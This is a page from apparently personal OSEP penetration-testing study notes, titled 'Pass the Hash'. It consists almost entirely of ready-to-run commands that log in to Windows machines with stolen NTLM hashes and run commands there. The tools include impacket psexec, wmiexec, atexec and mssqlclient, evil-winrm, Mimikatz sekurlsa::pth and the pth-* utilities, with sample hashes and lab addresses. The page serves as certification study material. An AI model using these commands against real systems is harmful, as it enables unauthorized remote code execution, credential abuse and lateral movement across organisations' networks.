OSEP Notes
  • Introduction
  • Useful Links, Tools & Tricks
  • OSEP
    • Metasploit Payload & Listener
      • Metasploit Useful Modules
      • Encoder
    • File Transfer & Execution
    • Phishing
    • Local Reconnaissance Windows
      • SQL Server Instance
      • Application Whitelisting & Credentials
    • Local Reconnaissance Linux
      • Ansible
    • Privilege Escalation
    • Pivoting
    • Pass the Hash
      • Remote Access
    • Post Exploitation
      • Add User
      • AMSI, CLM, & App Locker
    • Credentials
    • Lateral Movement
  • Active Directory
    • Domain Reconnaissance on Kali
    • Domain Reconnaissance on Windows
    • Active Directory Forest
Powered by GitBook
On this page
  1. OSEP

Pass the Hash

PreviousPivotingNextRemote Access

Last updated 1 year ago

PsExec

proxychains -q psexec.py -k -no-pass domain.com/username@machine -dc-ip IP -tartget-ip IP

python psexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 Administrator@192.168.1.2

WinRM

evil-winrm -i 192.168.1.2 -u [domain\\]username -H 052e763020c5da81d4085a05e69b0f1b

WMI

python3 impacket/examples/wmiexec.py -k --no-pass [domain/]username@192.168.1.2

SQL

python3 impacket/examples/mssqlclient.py -p 1433  -windows-auth domain/username@1.1.1.1 -hashes :052e763020c5da81d4085a05e69b0f1b

Mimikatz

mimikatz.exe "privilege::debug" "sekurlsa::pth /user:admin /domain:red.local /ntlm:09238831b1af5edab93c773f56409d96" exit

other

python smbclient.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@192.168.1.2

pth-smbclient -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.2/c$

pth-wmic -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.2 "select Name from Win32_UserAccount"

python rpcdump.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@192.168.1.2

pth-rpcclient -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.2

pth-net rpc share list -U 'ignite\Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38' -S 192.168.1.2

python atexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 Administrator@192.168.1.2 whoami

python lookupsid.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@192.168.1.2

python samrdump.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@192.168.1.2
https://vk9-sec.com/impacket-remote-code-execution-rce-on-windows-from-linux/